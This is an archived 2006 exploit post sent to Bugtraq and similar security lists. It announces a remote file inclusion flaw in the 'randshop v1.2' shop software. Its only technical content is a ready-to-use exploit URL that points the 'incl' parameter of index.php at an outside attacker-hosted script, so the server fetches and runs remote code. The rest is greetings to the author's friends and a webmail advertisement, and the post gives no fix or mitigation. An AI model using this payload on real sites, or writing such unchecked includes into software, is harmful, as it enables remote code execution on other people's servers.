
Date: Tue, 04 Jul 2006 13:53:37 +0300
From: "black code" <black-cod3@...mail.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com,
	bugtraq@...ph3us.org, content@...uritydot.net,
	listadmin@...urityfocus.com, MAILER-DAEMON@...ta.fr,
	MAILER-DAEMON@...lex05.paran.com, postmaster@...an.com,
	root@...uritydot.net, str0ke@...w0rm.com, submit@...w0rm.com,
	webmaster@...urityfocus.com
Subject: file include exploits in randshop v1.2


file include exploits in randshop v1.2
forum type : randshop v1.2
bug found by : black-code
team : site-down
type : file include

####################################################
Exploits :


http://www.example.com/randshop/index.php?incl=http://evilscript?

####################################################



#######################
emails:

black-cod3@...mail.com  &  gamr-14@...mail.com
#######################
Greetz to my friends : Shereba, Killer XxX, Crash_over_ride

All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



